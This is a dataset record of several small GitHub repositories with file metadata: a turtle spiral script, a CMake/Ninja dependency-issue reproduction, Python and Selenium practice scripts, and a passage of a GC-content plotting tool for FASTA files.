repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
hoshen20-meet/meet2018y1lab6
https://github.com/hoshen20-meet/meet2018y1lab6
578f642a830ed37c9389a02d86fd5bebb6c3a644
68e70de443eba980b1de8b865eea8337aa82e6d3
51c892c9923ff3ae248c214dd9212a7a7bab2afe
refs/heads/master
2020-03-22T13:39:17.688880
2018-08-05T13:28:07
2018-08-05T13:28:07
140,122,690
0
0
MIT
2018-07-07T23:08:23
2018-06-23T22:49:01
2018-06-23T22:48:59
null
[ { "alpha_fraction": 0.5487805008888245, "alphanum_fraction": 0.6097561120986938, "avg_line_length": 16.69230842590332, "blob_id": "9939c5775d063d8d6858c02f6a629c39b12b4092", "content_id": "7c09a71db0078b990ab4cd62837f31b1190d482a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "permissive", "max_line_length": 41, "num_lines": 13, "path": "/spiral.py", "repo_name": "hoshen20-meet/meet2018y1lab6", "src_encoding": "UTF-8", "text": "import turtle\n\ncolors = ['green','blue','orange', 'red']\n\n\nturtle.speed(900)\nfor i in range(99999999):\n turtle.pencolor(colors[i%4])\n turtle.bgcolor('black')\n turtle.forward(i)\n turtle.degrees()\n\n turtle.right(421)\n \n \n \n\n" } ]
1
AndiDog/cmake-depend-on-file-issue
https://github.com/AndiDog/cmake-depend-on-file-issue
c8f8a0b2de1b4a12b81b538ca2a948d367df1f3b
e029d5bafb7e9382cbebca7118dc3f82949682c5
8fef778eb5d10405be3389583fbd1f216503125e
refs/heads/master
2021-07-15T06:01:26.988313
2017-10-21T21:42:59
2017-10-21T21:56:12
107,817,825
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6635730862617493, "alphanum_fraction": 0.6774942278862, "avg_line_length": 27.733333587646484, "blob_id": "a0d4f2a2d0dbad1ed914a356a38aa3e8be6b6bbc", "content_id": "73868056d8626ccb5e60daaed56286cbbbe10bd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 431, "license_type": "no_license", "max_line_length": 56, "num_lines": 15, "path": "/run_into_issue.sh", "repo_name": "AndiDog/cmake-depend-on-file-issue", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nset -e\n[ -e mysubdir ] || { >&2 echo Wrong directory; exit 1; }\nrm -rf .build\nmkdir .build\n(cd .build && cmake -GNinja .. && ninja)\nls -la mysubdir/common.py .build/mysubdir/M*\nsleep 62 # overlong breaks...\necho \"`date` TOUCH\"\ntouch mysubdir/common.py\nsleep 62 # ...to see the file times clearly\necho \"`date` BUILD AGAIN\"\n(cd .build && ninja)\nls -la mysubdir/common.py .build/mysubdir/M*\necho \"`date` FINISHED\"\n" }, { "alpha_fraction": 0.7835051417350769, "alphanum_fraction": 0.8041236996650696, "avg_line_length": 31.33333396911621, "blob_id": "fec57773cee92bfe859ab7157bd7962ca4536f68", "content_id": "263e818403644ca6ba9a65d47355c7c6cc0039a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 97, "license_type": "no_license", "max_line_length": 35, "num_lines": 3, "path": "/CMakeLists.txt", "repo_name": "AndiDog/cmake-depend-on-file-issue", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 3.9)\nproject(\"Depend on file example\")\nadd_subdirectory(mysubdir)\n" }, { "alpha_fraction": 0.6730901598930359, "alphanum_fraction": 0.7405368089675903, "avg_line_length": 44.40625, "blob_id": "79d9481d330c5dd4e9a7c88d549538a84b4c0fde", "content_id": "f103a4acf150e8f5fd9f21a6f45bec81aaa8f3e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1453, "license_type": "no_license", "max_line_length": 125, "num_lines": 32, "path": "/README.md", "repo_name": "AndiDog/cmake-depend-on-file-issue", "src_encoding": "UTF-8", "text": "Example output:\n\n```\n-- The C compiler identification is AppleClang 9.0.0.9000038\n-- The CXX compiler identification is AppleClang 9.0.0.9000038\n-- Check for working C compiler: /usr/local/opt/ccache/libexec/cc\n-- Check for working C compiler: /usr/local/opt/ccache/libexec/cc -- works\n-- Detecting C compiler ABI info\n-- Detecting C compiler ABI info - done\n-- Detecting C compile features\n-- Detecting C compile features - done\n-- Check for working CXX compiler: /usr/local/opt/ccache/libexec/c++\n-- Check for working CXX compiler: /usr/local/opt/ccache/libexec/c++ -- works\n-- Detecting CXX compiler ABI info\n-- Detecting CXX compiler ABI info - done\n-- Detecting CXX compile features\n-- Detecting CXX compile features - done\n-- Configuring done\n-- Generating done\n-- Build files have been written to: /Users/asommer/dev/extern/cmake-depend-on-file-issue/.build\n[2/2] Linking CXX executable mysubdir/MyExe\n-rwxr-xr-x 1 asommer wheel 4248 Oct 21 23:47 .build/mysubdir/MyExe\n-rw-r--r-- 1 asommer wheel 24 Oct 21 23:43 mysubdir/common.py\nSat Oct 21 23:48:20 CEST 2017 TOUCH\nSat Oct 21 23:49:22 CEST 2017 BUILD AGAIN\nninja: no work to do.\n-rwxr-xr-x 1 asommer wheel 4248 Oct 21 23:47 .build/mysubdir/MyExe\n-rw-r--r-- 1 asommer wheel 24 Oct 21 23:48 mysubdir/common.py\nSat Oct 21 23:49:22 CEST 2017 FINISHED\n```\n\nSee how ninja does not see any work on second build, even though \"common.py\" is newer than \"MyExe\" which should depend on it.\n" }, { "alpha_fraction": 0.7947019934654236, "alphanum_fraction": 0.7947019934654236, "avg_line_length": 36.75, "blob_id": "0ef72fc6bbffe78c9d7cc63b70ca36fb0538565c", "content_id": "eafdc104a54f8b44e47b92345df210ec0f0e795d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 151, "license_type": "no_license", "max_line_length": 80, "num_lines": 4, "path": "/mysubdir/CMakeLists.txt", "repo_name": "AndiDog/cmake-depend-on-file-issue", "src_encoding": "UTF-8", "text": "add_custom_target(common_source DEPENDS \"${CMAKE_CURRENT_SOURCE_DIR}/common.py\")\n\nadd_executable(MyExe main.cpp)\nadd_dependencies(MyExe common_source)\n" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 23, "blob_id": "e23ffc4a2cc7b9e7f8cb2399187aafec87b9ffc9", "content_id": "b0ef15b52b3c0af873e4840e34207ea6fae3fe96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24, "license_type": "no_license", "max_line_length": 23, "num_lines": 1, "path": "/mysubdir/common.py", "repo_name": "AndiDog/cmake-depend-on-file-issue", "src_encoding": "UTF-8", "text": "CONTENT DOES NOT MATTER\n" } ]
5
kunallray/jenkins_test
https://github.com/kunallray/jenkins_test
e95963f51e590c5840be04072e178a94df8ba7b7
b8a1389d3ce51f37e805a31ba1cbb5e8032fad44
16d32415679d237ca2b6fe9d227e024a4e200b7a
refs/heads/master
2022-11-18T19:30:10.729473
2020-07-17T22:41:10
2020-07-17T22:41:10
280,538,399
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5756097435951233, "alphanum_fraction": 0.6048780679702759, "avg_line_length": 14.769230842590332, "blob_id": "4384c4a79a3e66483d23c58cd50027c8d7379891", "content_id": "2101b7d7b9501dc9ba1570d126209f2601e5c0de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 41, "num_lines": 13, "path": "/demo.py", "repo_name": "kunallray/jenkins_test", "src_encoding": "UTF-8", "text": "class person:\n def display(self):\n print(\"i am a person\")\n\n def greet(self):\n print(\"hello, how are you doing\")\n\np1=person()\np2=person()\np1.display()\np1.greet()\np2.display()\np2.greet()\n" }, { "alpha_fraction": 0.7942973375320435, "alphanum_fraction": 0.7942973375320435, "avg_line_length": 34.07143020629883, "blob_id": "2899ecb319525016df1ff24c3c3c9f6932e8e44b", "content_id": "dc0d7cb1370736db6b2c03e4ed65058c1a0ba21f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 491, "license_type": "no_license", "max_line_length": 80, "num_lines": 14, "path": "/sample_oops.py", "repo_name": "kunallray/jenkins_test", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.keys import Keys\n\ndriver = webdriver.Chrome(executable_path=\"C:\\\\chromedriver.exe\")\n\ndriver.get(\"https://chercher.tech/practice/practice-pop-ups-selenium-webdriver\")\n\naction=ActionChains(driver)\naction.double_click(driver.find_element_by_id(\"double-click\")).perform()\n\nalert=driver.switch_to.alert\nassert \"You double clicked me!!!, You got to be kidding me\"==alert.text\nalert.accept()\n" } ]
2
leli-li/GC-content
https://github.com/leli-li/GC-content
c50ea8832f3d74af7f3737152b62e26144205a17
7731502b69ec4691cfb60e07998a2fe9bd28b139
6ddfce1b33799f761c3f0783f9040333b4ebff79
refs/heads/main
2023-03-21T17:30:14.667261
2021-03-20T10:14:52
2021-03-20T10:14:52
349,678,192
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6869741082191467, "alphanum_fraction": 0.7071692943572998, "avg_line_length": 40.22222137451172, "blob_id": "a9b14b30cca22fff3b446588a335abd1cbdf54e7", "content_id": "b8e6b8e72b07ea87b3d26739593775f622758155", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2971, "license_type": "no_license", "max_line_length": 197, "num_lines": 72, "path": "/README.md", "repo_name": "leli-li/GC-content", "src_encoding": "UTF-8", "text": "# Introduction\n\n### This program is a tool that uses sliding window to calculate GC content and plot graphs.\n### The software first reads the sequence from the fasta file, then merges the sequences, and calculates the GC content of each window according to the sliding window and step size set by the user.\n\n### Calculating GC content: (G+C)/(A+T+G+C)\n\n# Input file\n### The input file should be fasta format. The file can contain one or more sequences.\n\n\n# Program function\n## Single file processing :\n### combine sequences in fasta file and plot GC content through this large sequence. The output is a line chart.\n### plot distribution histogram based on each sequence in fasta file. The output is a histogram.\n### filter sequence using a range of GC content. The output is a new fasta file.\n\n## pairwise comparison : \n### Input two files and plot two lines of GC conteng in one graph. The output is one line chart. \n\n## File batch processing :\n### Input more than one fasta files and do single file processing on each file. The number of output line charts is the same as the number of input files.\n### The input files and this script should be put in the same directory without other files.\n\n## Batch pairwise comparison :\n### Input more than two fasta files and pairwise comparison on these files. If the number of input files is n, the number of output files should be [n*(n-1)]/2.\n### The input files and this script should be put in the same directory without other files.\n\n## all lines plotted in one graph :\n### Plot all lines in one line chart. The output is one graph.\n### The input files and this script should be put in the same directory without other files.\n\n\n# Usage\npython gc_content.py [-h] [-f FILE [FILE ...]] [-w WINDOW] [-s STEP]\n [-r Lower limit upper limit]\n {s,c,b,bc,a}\n\n## required arguments:\n### This parameter can only choose one from {s,c,b,bc,a}\n### single(s)\n### pairwise comparison(c)\n### batch single file processing(b)\n### batch pairwise comparison(bc) \n### all lines plotted in one graph(a)\n\n## optional arguments:\n### -h, --help show this help message and exit\n### -f FILE [FILE ...] --file FILE [FILE ...] : input file\n### \t\t\tfile name should be the whole name (with suffix)\n### -w WINDOW, --window WINDOW : set the size of sliding window\n### -s STEP, --step STEP : step size\n### -r Lower limit upper limit, --range Lower limit upper limit : set the range of GC content to filter sequences. between 0 and 100\n\n# example\n### single file:\npython gc_content.py s -f input_file -w 100000 -s 1000\n### fileter sequence:\npython gc_content.py s -f input_file -r 10 30\n\n\n### pairwise comparison:\npython gc_content.py c -f input_file1 input_file2 -w 10000 -s 100\n\n### batch single file processing:\npython gc_content.py b -w 100000 -s 1000\n\n### batch pairwise comparison:\npython gc_content.py bc -w 100000 -s 1000\n\n### plot all lines in one graph:\npython gc_content.py a -w 100000 -s 1000\n\n\n\n" }, { "alpha_fraction": 0.5978512763977051, "alphanum_fraction": 0.6126236319541931, "avg_line_length": 44.17481231689453, "blob_id": "ade3bae9695f28f7dd3e00a09ad8a83ce5d26b2a", "content_id": "e5f7e7f08ca0a0288dc5b30efe5986bc96d1f6cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24573, "license_type": "no_license", "max_line_length": 232, "num_lines": 532, "path": "/gc_content.py", "repo_name": "leli-li/GC-content", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis program is a tool to plot GC content\r\n@author: lily\r\n\"\"\"\r\n\r\n#import standard modules\r\nimport sys\r\nimport os\r\nimport argparse\r\n\r\n#import non-standard modules\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.ticker as ticker\r\n\r\n#check if the non-standard modules are installed\r\ntry:\r\n import matplotlib\r\nexcept ModuleNotFoundError:\r\n print('No module named matplotlib'+'\\n'+'please install it')\r\n sys.exit()\r\n\r\n\r\n# create the parser\r\n\r\ngc_parser = argparse.ArgumentParser(description='A tool for plotting GC content based on sliding window')\r\n\r\n#add position argument: mode argument\r\n#this program has five modes of processing files\r\ngc_parser.add_argument('mode',help='choose mode of program: single(s), pairwise comparison(c), batch processing(b), batch pairwise comparison(bc) and all lines in one plot(a)', choices=[\"s\",\"c\",\"b\",\"bc\",\"a\"],nargs=1,type=str)\r\n\r\n#add other arguments\r\ngc_parser.add_argument(\"-f\",\"--file\", help=\"input file\", nargs=\"+\", type=str) #\r\ngc_parser.add_argument(\"-w\",\"--window\", help=\"set the size of sliding window\", nargs=1, type=int)\r\ngc_parser.add_argument(\"-s\",\"--step\", help=\"set the step\", nargs=1, type=int)\r\ngc_parser.add_argument(\"-r\",\"--range\",metavar=(\"Lower limit\",\"upper limit\"),help=\"set the range of GC content to filter sequences. between 0 and 100\", nargs=2, type=int)\r\n# Execute the parse_args() method\r\nargs = gc_parser.parse_args()\r\n\r\n\r\ndef file_processing():\r\n#this function is to store the id and corresponding sequence into a dictionary\r\n#this dictionary is used to plot the distribution of gc content of each sequence \r\n#and used to filter sequences by a range of gc content \r\n#also combine sequences to a whole one. this is used to plot gc content through the whole sequence(usually the genome)\r\n global seq_dict #make variables to be used in the whole program\r\n global f_basename\r\n global whole_seq\r\n f = open(file,\"r\") \r\n f_basename=file.split(\".\")[0] #extract file name without suffix\r\n seq_dict={} #the dictionary of id and corresponding sequence\r\n for line in f: #combine the sequence if the sequence occupies more than one line\r\n if \">\" in line:\r\n seq_id = line.split(\" \")[0]\r\n seq_id = seq_id.strip()\r\n seq_id = seq_id.strip(\">\")\r\n seq = \"\" \r\n if \">\" not in line:\r\n line=line.strip()\r\n line=line.strip(\"-\")\r\n line=line.strip(\"-\")\r\n seq=seq+line \r\n seq_dict[seq_id]=seq #key is the id and value is the sequence\r\n#print some information to tell the user about running process\r\n print(\"\\n\" + \"File:\" + f_basename+\"\\n\") \r\n print(\"Number of sequences:\"+ str(len(seq_dict))+\"\\n\")\r\n#combine sequence to a whole sequence \r\n#it is used to plot GC content through the whole sequence(usually the genome) \r\n whole_seq=\"\"\r\n for seq in seq_dict.values():\r\n whole_seq=whole_seq+seq\r\n whole_seq=whole_seq.upper()\r\n print(\"Total length:\"+ str(len(whole_seq))) \r\n\r\ndef GC_content_distribution():\r\n#this function is to calculate GC content of each sequence and plot histogram:\r\n seq_gc=[] #store GC contents of each sequence \r\n for id in seq_dict:\r\n numerator=seq_dict[id].upper().count('G')+seq_dict[id].upper().count('C') #when calculating GC content, convert letters to uppercase letters\r\n denominator=seq_dict[id].upper().count('G')+seq_dict[id].upper().count('C')+seq_dict[id].upper().count('A')+seq_dict[id].upper().count('T')\r\n if denominator!=0:\r\n ratio = numerator/denominator\r\n seq_gc.append(ratio)\r\n if denominator==0: #consider the situation of there's no stand nucleotides in a sequence\r\n ratio = 0\r\n seq_gc.append(0)\r\n fig = plt.figure(figsize=(15,10),dpi=300) #set the size of graph , it is only a blank graph\r\n ax = fig.add_subplot(1, 1, 1) #only add one figure\r\n ax.hist(seq_gc, bins=10, histtype='bar',color='steelblue') #plot\r\n plt.xlim(0,1) #set the range of x axis\r\n plt.xlabel('GC content',fontsize = 20) #add the labels of axis\r\n plt.ylabel('Counts of sequences',fontsize = 20)\r\n plt.tick_params(labelsize=15) #set the size of valus in axis\r\n plt.title(f_basename , fontsize=30,fontweight=\"heavy\") #set the title of graph\r\n plt.savefig(f_basename+\"_fre.png\") #save graph , the name is based on input file name\r\n\r\n\r\n\r\ndef calculate_GC():\r\n#this function is to calculate GC content based on sliding window\r\n global window_size #make variables to be used in the whole program\r\n global step\r\n global window\r\n global remainder\r\n global middle_p\r\n global interval\r\n global gc_list\r\n global stop_list\r\n global remainder_gc\r\n window_size = int(args.window[0]) #retrieve the window size from command\r\n step = int(args.step[0])\r\n #set the value of interval of x axis\r\n interval = str(int(len(whole_seq)/6))\r\n inter_list=list(interval)\r\n for i in range(1,len(inter_list)): #make the other digits are zero except the first one, so that the value in x axis are the numbers ending with zero\r\n inter_list[i]=\"0\"\r\n interval=int(\"\".join(inter_list)) \r\n seq_length = len(whole_seq)\r\n window={}\r\n remainder=[] \r\n stop_list=[]\r\n middle_p=[] \r\n start_list=[]\r\n if step != 0: #consider different situations of step value\r\n for start_index in range(0,seq_length,step): #the step decides the start position of a sliding window ,and the window size decides the length ,that is the stop position of a sliding window\r\n stop_index = start_index + window_size -1\r\n if stop_index <= seq_length-1: \r\n window[start_index] = stop_index\r\n stop_list.append(stop_index) \r\n start_list.append(start_index)\r\n if step ==0:\r\n for start_index in range(0,seq_length,window_size): \r\n stop_index = start_index + window_size -1\r\n if stop_index <= seq_length-1: \r\n window[start_index] = stop_index\r\n stop_list.append(stop_index) \r\n #deal with the remainder part in a sequence: \r\n if step != 0:\r\n if stop_list[-1] < seq_length -1: \r\n for a in range(start_list[-1]+step, seq_length):\r\n remainder.append(a)\r\n if step == 0:\r\n if stop_list[-1] < seq_length -1 :\r\n for a in range(int(stop_list[-1])+1, seq_length):\r\n remainder.append(a)\r\n#generate the values in x axis, which is the middle position of a window\r\n#the index should plus 1 because python index starts with 0, but in real sequence index starts with 1\r\n for index in window.keys():\r\n middle = ((index+1)+(window[index]+1))/2 \r\n middle_p.append(middle) \r\n if len(remainder)>0:\r\n remainder_middle=((remainder[0]+1)+(remainder[-1]+1))/2\r\n middle_p.append(remainder_middle) \r\n#calculate_gc_content: \r\n gc_list = [] #this list is the y axis \r\n for a,b in zip (list(window.keys()),list(window.values())):\r\n segment=whole_seq[a:(b+1)]\r\n if (segment.count(\"G\")+segment.count(\"C\")+segment.count(\"A\")+segment.count(\"T\")) !=0:\r\n gc=(segment.count(\"G\")+segment.count(\"C\")) / (segment.count(\"G\")+segment.count(\"C\")+segment.count(\"A\")+segment.count(\"T\"))\r\n gc_list.append(gc)\r\n if (segment.count(\"G\")+segment.count(\"C\")+segment.count(\"A\")+segment.count(\"T\")) ==0:\r\n gc_list.append(0)\r\n if len(remainder)>0:\r\n remainder_segment = whole_seq[remainder[0]:]\r\n if (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")+remainder_segment.count(\"A\")+remainder_segment.count(\"T\")) !=0:\r\n remainder_gc = (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")) / (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")+remainder_segment.count(\"A\")+remainder_segment.count(\"T\")) \r\n gc_list.append(remainder_gc)\r\n if (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")+remainder_segment.count(\"A\")+remainder_segment.count(\"T\")) ==0:\r\n gc_list.append(0)\r\n\r\ndef single_line_chart():\r\n#plot of one single file \r\n#generate a baseline of mean value\r\n#calculate mean value of sliding windows\r\n total_gc=0\r\n for value in gc_list:\r\n total_gc=total_gc+value\r\n mean_gc=total_gc/len(gc_list) \r\n x = middle_p\r\n y = gc_list\r\n fig = plt.figure(figsize=(20,10),dpi=300) #set a blank figure\r\n ax = fig.add_subplot(1, 1, 1) # add one plot\r\n ax.plot(x,y,label=f_basename,linewidth=2.3) #plot the line of GC content\r\n ax.xaxis.set_major_locator(ticker.MultipleLocator(interval)) #set the values displayed of x axis\r\n ax.ticklabel_format(useOffset=False, style='plain') #not show the scientific notation\r\n #plot a straight line of mean value\r\n a = [0,len(whole_seq)] \r\n b = [mean_gc,mean_gc]\r\n ax.plot(a,b,label=\"mean=\"+str(round(mean_gc,2)),color=\"lightcoral\",linewidth=2,linestyle=\"--\")\r\n plt.title(f_basename,fontsize=30,fontweight=\"heavy\") #set the title\r\n plt.xlabel('Position',fontsize = 20) #set the label of axis\r\n plt.ylabel('GC content',fontsize = 20)\r\n plt.ylim(min(gc_list)-0.1,max(gc_list)+0.1)\r\n plt.tick_params(labelsize=15) #set the size of numbers of axis\r\n plt.legend(ncol=1,fontsize=15,loc=\"upper right\") #set the size of legend and make it show in one column\r\n plt.text(len(whole_seq)/2,min(gc_list)-0.1+0.02,s=\"window size=\"+str(window_size)+\"\\n\"+\"step=\"+str(step),horizontalalignment='center',verticalalignment='top',fontsize=12,color=\"slategrey\") #add the text of window size and step\r\n plt.savefig(f_basename+\"_line.png\") #save the graph\r\n\r\n\r\n\r\ndef sequence_filter():\r\n#this function is to filter sequence of a specific range \r\n#get the range from the arguments in command\r\n lower_limit=float(args.range[0])\r\n upper_limit=float(args.range[1])\r\n#calculate GC content of each sequence and write to file\r\n out=open(f_basename+\"_filter.out\",\"w\")\r\n for id in seq_dict:\r\n numerator=seq_dict[id].upper().count('G')+seq_dict[id].upper().count('C')\r\n denominator=seq_dict[id].upper().count('G')+seq_dict[id].upper().count('C')+seq_dict[id].upper().count('A')+seq_dict[id].upper().count('T')\r\n if denominator!=0:\r\n ratio = round(numerator/denominator,2)\r\n if lower_limit <= ratio *100 <= upper_limit:\r\n out.write(\">\"+id+\"\\t\"+\"GC=\"+str((ratio))+\"\\n\"+seq_dict[id]+\"\\n\")\r\n if denominator==0:\r\n ratio = 0\r\n if lower_limit <= ratio * 100 <= upper_limit:\r\n out.write(\">\"+id+\"\\t\"+\"GC=\"+str((ratio))+\"\\n\"+seq_dict[id]+\"\\n\")\r\n out.close() \r\n\r\n\r\ndef another_file_processing():\r\n#this function is used in pairwise comparison\r\n#it is used to process another file\r\n global seq_dict2\r\n global f_basename2\r\n global whole_seq2\r\n f = open(file2,\"r\") \r\n f_basename2=file2.split(\".\")[0]\r\n seq_dict2={}\r\n for line in f: #combine the sequence if the sequence occupies more than one line\r\n if \">\" in line:\r\n seq_id = line.split(\" \")[0]\r\n seq_id = seq_id.strip()\r\n seq_id = seq_id.strip(\">\")\r\n seq = \"\" \r\n if \">\" not in line:\r\n line=line.strip()\r\n line=line.upper()\r\n seq=seq+line\r\n seq_dict2[seq_id]=seq \r\n#print some information to tell the user about running process\r\n print(\"\\n\" + \"File2:\" + f_basename2+\"\\n\")\r\n print(\"Number of sequences:\"+ str(len(seq_dict2))+\"\\n\")\r\n f.close()\r\n#combine sequence to a whole sequence \r\n whole_seq2=\"\"\r\n for seq in seq_dict2.values():\r\n whole_seq2=whole_seq2+seq\r\n whole_seq2=whole_seq2.upper()\r\n print(\"Total length:\"+ str(len(whole_seq2)))\r\n\r\n\r\ndef another_GC_and_comparison_plot():\r\n#this function is used in pairwise comparison\r\n#calculate GC_content of file2 and plot line charts of file1 and file2 in a same figure\r\n global window2\r\n global remainder2\r\n global middle_p2\r\n global interval2\r\n global gc_list2\r\n #calculate the interval of x axis\r\n interval2 = str(int(len(whole_seq2)/6))\r\n inter_list=list(interval2)\r\n for i in range(1,len(inter_list)): #make the other digits are zero except the first one, so that the value in x axis are the numbers ending with zero\r\n inter_list[i]=\"0\"\r\n interval2=int(\"\".join(inter_list)) \r\n seq_length = len(whole_seq2)\r\n window2={}\r\n remainder2=[] \r\n stop_list=[]\r\n middle_p2=[] \r\n start_list=[]\r\n if step != 0:\r\n for start_index in range(0,seq_length,step):\r\n stop_index = start_index + window_size -1\r\n if stop_index <= seq_length-1: \r\n window2[start_index] = stop_index\r\n stop_list.append(stop_index)\r\n start_list.append(start_index)\r\n if step ==0:\r\n for start_index in range(0,seq_length,window_size): \r\n stop_index = start_index + window_size -1\r\n if stop_index <= seq_length-1: \r\n window2[start_index] = stop_index\r\n stop_list.append(stop_index) \r\n#deal with the remainder part in sequence: \r\n if step != 0:\r\n if stop_list[-1] < seq_length -1 : \r\n for a in range(start_list[-1]+step, seq_length):\r\n remainder2.append(a)\r\n if step == 0:\r\n if stop_list[-1] < seq_length -1 :\r\n for a in range(int(stop_list[-1])+1, seq_length):\r\n remainder2.append(a)\r\n#generate the x axis, which is the middle position of a window\r\n#the index should plus 1 because python index starts with 0, but in real sequence index starts with 1\r\n for index in window2.keys():\r\n middle = ((index+1)+(window2[index]+1))/2 \r\n middle_p2.append(middle) \r\n if len(remainder2)>0:\r\n remainder_middle=((remainder2[0]+1)+(remainder2[-1]+1))/2\r\n middle_p2.append(remainder_middle) \r\n#calculate_gc_content: \r\n gc_list2 = []\r\n for a,b in zip (list(window2.keys()),list(window2.values())):\r\n segment=whole_seq2[a:(b+1)]\r\n if (segment.count(\"G\")+segment.count(\"C\")+segment.count(\"A\")+segment.count(\"T\")) !=0:\r\n gc=(segment.count(\"G\")+segment.count(\"C\")) / (segment.count(\"G\")+segment.count(\"C\")+segment.count(\"A\")+segment.count(\"T\"))\r\n gc_list2.append(gc)\r\n if (segment.count(\"G\")+segment.count(\"C\")+segment.count(\"A\")+segment.count(\"T\")) ==0:\r\n gc_list2.append(0)\r\n if len(remainder2)>0:\r\n remainder_segment = whole_seq2[remainder2[0]:]\r\n if (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")+remainder_segment.count(\"A\")+remainder_segment.count(\"T\")) !=0:\r\n remainder_gc = (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")) / (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")+remainder_segment.count(\"A\")+remainder_segment.count(\"T\")) \r\n gc_list2.append(remainder_gc)\r\n if (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")+remainder_segment.count(\"A\")+remainder_segment.count(\"T\")) ==0:\r\n gc_list2.append(0)\r\n\r\n#calculate average GC content of genome1\r\n total_gc=0\r\n for value in gc_list:\r\n total_gc=total_gc+value\r\n mean_gc=total_gc/len(gc_list)\r\n#calculate average GC content of genome2\r\n total_gc2=0\r\n for value in gc_list2:\r\n total_gc2=total_gc2+value\r\n mean_gc2=total_gc2/len(gc_list2)\r\n#generate a baseline: average GC content of the two mean values\r\n ave_gc=round((mean_gc+mean_gc2)/2,2) \r\n fig = plt.figure(figsize=(20,10),dpi=300)\r\n ax = fig.add_subplot(1, 1, 1)\r\n#plot the first genome \r\n x = middle_p\r\n y = gc_list \r\n ax.plot(x,y,label=f_basename+\":mean=\"+str(round(mean_gc,2)),linewidth=2.3) \r\n ax.ticklabel_format(useOffset=False, style='plain') #not show the scientific notation\r\n#plot the second genome \r\n x2 = middle_p2\r\n y2 = gc_list2 \r\n ax.plot(x2,y2,label=f_basename2+\":mean=\"+str(round(mean_gc2,2)),linewidth=2.3)\r\n ax.ticklabel_format(useOffset=False, style='plain') #not show the scientific notation\r\n#plot the baseline\r\n a = [0,max(len(whole_seq),len(whole_seq2))]\r\n b = [ave_gc,ave_gc]\r\n ax.plot(a,b,label=\"mean=\"+str(round(ave_gc,2)),color=\"lightcoral\",linewidth=2,linestyle=\"--\")\r\n#set the parameters of the plot\r\n ax.xaxis.set_major_locator(ticker.MultipleLocator(max(interval,interval2))) #the interval of x axis should be the max value\r\n plt.ylim(min(min(gc_list),min(gc_list2))-0.1,max(max(gc_list),max(gc_list2))+0.1)\r\n plt.title(f_basename+\" VS \"+f_basename2,fontsize=30,fontweight=\"heavy\")\r\n plt.xlabel('Position',fontsize = 20)\r\n plt.ylabel('GC content',fontsize = 20)\r\n plt.tick_params(labelsize=15)\r\n plt.legend(ncol=1,fontsize=15,loc=\"upper right\")\r\n #add the text of window size and step, and make its position in the middle bottom of the graph\r\n plt.text(max(len(whole_seq),len(whole_seq2))/2,min(min(gc_list),min(gc_list2))-0.1+0.02,s=\"window size=\"+str(window_size)+\"\\n\"+\"step=\"+str(step),horizontalalignment='center',verticalalignment='top',fontsize=12,color=\"slategrey\")\r\n plt.savefig(f_basename+\"_VS_\"+f_basename2+\".png\")\r\n\r\n#The following part is to use the function with different arguments\r\n#check if the file is missing\r\nif args.mode[0]== \"s\" and not args.file: \r\n print(\"input file missing, nothing will happen\")\r\n sys.exit()\r\n\r\n\r\n#mode of single file\r\n#input file and processing\r\nif args.mode[0]==\"s\" and args.file: #if this argument is used\r\n file = args.file[0]\r\n try: #check the existence of file\r\n open(file,\"r\")\r\n except IOError:\r\n print(\"file does not exit,please check the file name\")\r\n sys.exit() \r\n file_processing() \r\n print(\"\\n\"+\"File is read successfully!\"+\"\\n\")\r\n if args.range: #use the range argument to filter sequences\r\n print(\"sequence filtering is processing\" + \"\\n\")\r\n if args.range[0]> args.range[1]:\r\n print (\"lower limit cannot be higher than upper limit!\")\r\n sys.exit()\r\n else:\r\n sequence_filter()\r\n print(\"Output file is saved as \" + f_basename+\"_filter.out\")\r\n if not args.range: \r\n if not args.window or not args.step:\r\n print( \"Histogram of GC content distribution will be plotted automatically\" + \"\\n\")\r\n GC_content_distribution()\r\n print(\"Histogram is saved as \" + f_basename +\"_dist.png\")\r\n if args.window and args.step: #use the argument of window size and step\r\n print(\"Line chart is being processed\" +\"\\n\")\r\n calculate_GC()\r\n 